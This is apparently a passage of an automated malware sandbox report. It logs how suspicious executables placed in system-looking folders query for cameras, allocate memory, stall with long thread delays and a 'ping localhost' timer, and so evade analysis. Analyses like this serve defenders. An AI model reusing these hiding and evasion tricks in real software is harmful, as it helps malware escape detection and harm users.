                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\webHostnet\MsPortSavesruntime.exeMemory allocated: 15B0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeMemory allocated: 1B160000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeMemory allocated: 26B0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeMemory allocated: 1A8E0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeMemory allocated: 13E0000 memory reserve | memory write watch
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeMemory allocated: 1B140000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeMemory allocated: C40000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeMemory allocated: 1A710000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeMemory allocated: 1340000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeMemory allocated: 1AD80000 memory reserve | memory write watch
                                    Source: C:\webHostnet\MsPortSavesruntime.exeMemory allocated: 2980000 memory reserve | memory write watch
                                    Source: C:\webHostnet\MsPortSavesruntime.exeMemory allocated: 1AB60000 memory reserve | memory write watch
                                    Source: C:\webHostnet\MsPortSavesruntime.exeMemory allocated: A60000 memory reserve | memory write watch
                                    Source: C:\webHostnet\MsPortSavesruntime.exeMemory allocated: 1A630000 memory reserve | memory write watch
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exeMemory allocated: EE0000 memory reserve | memory write watch
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exeMemory allocated: 1A8B0000 memory reserve | memory write watch
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 599890Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 599778Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 599671Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 599562Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 599453Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 599344Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 599234Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 599125Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 596953Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 596812Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 596615Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 596422Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 596203Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 599567Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 598687Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 598453Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 598281Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 598093Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 3600000Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 597937Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 597312Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 597078Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 596484Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 596015Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 595884Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 595750Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 595613Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 595325Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 595156Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 594944Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 594839Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 594718Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 594548Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 594422Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 594257Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 594147Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 593953Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 593812Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 593639Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 593466Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 593219Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 593100Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 300000Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 592984Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 592874Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 592764Jump to behavior
